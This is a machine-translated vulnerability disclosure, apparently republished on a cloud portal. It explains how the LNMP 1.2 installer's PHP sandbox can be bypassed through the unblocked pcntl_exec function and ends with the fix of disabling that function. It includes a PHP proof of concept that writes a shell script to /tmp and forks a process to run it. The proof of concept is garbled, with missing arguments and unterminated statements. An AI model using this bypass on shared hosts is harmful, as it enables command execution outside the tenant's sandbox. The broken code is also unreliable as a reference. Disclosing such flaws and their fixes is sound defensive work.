Home > Developer > Web Develop

RPM: Lnmp Virtual host PHP sandbox bypass/Command execution (after PHP EXEC command is banned)

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

LNMP Virtual Host PHP sandbox bypass/Command execution

LNMP Update version 1.2, a lot of things have been upgraded, great. However, a bug was found.

LNMP is a Linux under Nginx, PHP, MySQL one-click installation package.

Download: http://soft.vpser.net/lnmp/lnmp1.2.tar.gz

A simple installation can be performed with a single command.

Vulnerability Details

The LNMP is configured in such a sandbox:

    1. Disable_functions, CONFIGURED in include/php.sh:

The values are:

1 Passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_ Restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket
    1. Open_basedir, when creating a virtual host, configure:

For example, the method is to create a new. user.ini file in the virtual host and directory, and use this INI to set the Open_basedir, and give Chattr +i its non-modifiable permissions.

But if PHP can execute system commands, Open_basedir doesn't make any sense.

Let's look at the options for compiling PHP:

The pcntl:–enable-pcntl that the PHP default does not open is visible.

We look ahead, pcntl_exec is not disabled. I do not know why, this version of the Pcntl_exec to remove the disable, which led to the virtual host sandbox bypass, command execution.

Gives the method by which the pcntl_exec executes the command.

Pcntl_exec is similar to shell.application under Windows. We need to write a script file and then execute it.

The POC is as follows:

1234567891011121314151617 <?phpheader ( "Content-type:text/plain"); $cmd = "/tmp/exec"; @unlink ( $cmd); @unlink ( "/tmp/output"); $c = "#!/usr/bin/env bash\nuname-a >/tmp/output\n"; File_put_contents ( $cmd, chmod ( $cmd, 0777);  switch (Pcntl_fork ()) {case 0: $ret = Pcntl_exec ( $cmd); exit ( Default:echo "Case 1"; break; }

Write a script that executes the command and outputs the result to/tmp/output.

Then, using Pcntl_fork (), fork out a sub-process and call pcntl_exec in the subprocess to execute the script. Otherwise, executing pcntl_exec in the parent process will cause the process to remain in the waiting state, resulting in 502.

Then look at the output,echo file_get_contents("/tmp/output");

Execute arbitrary command sandbox bypass, the virtual host is meaningless.

Solution Solutions

Disable pcntl_exec, or do not –enable-pcntl

RPM: Lnmp Virtual host PHP sandbox bypass/Command execution (after PHP EXEC command is banned)

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
apache virtual host php rpm php php rpm php sandbox remote command execution ssh ssh command execution linux remote command execution

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More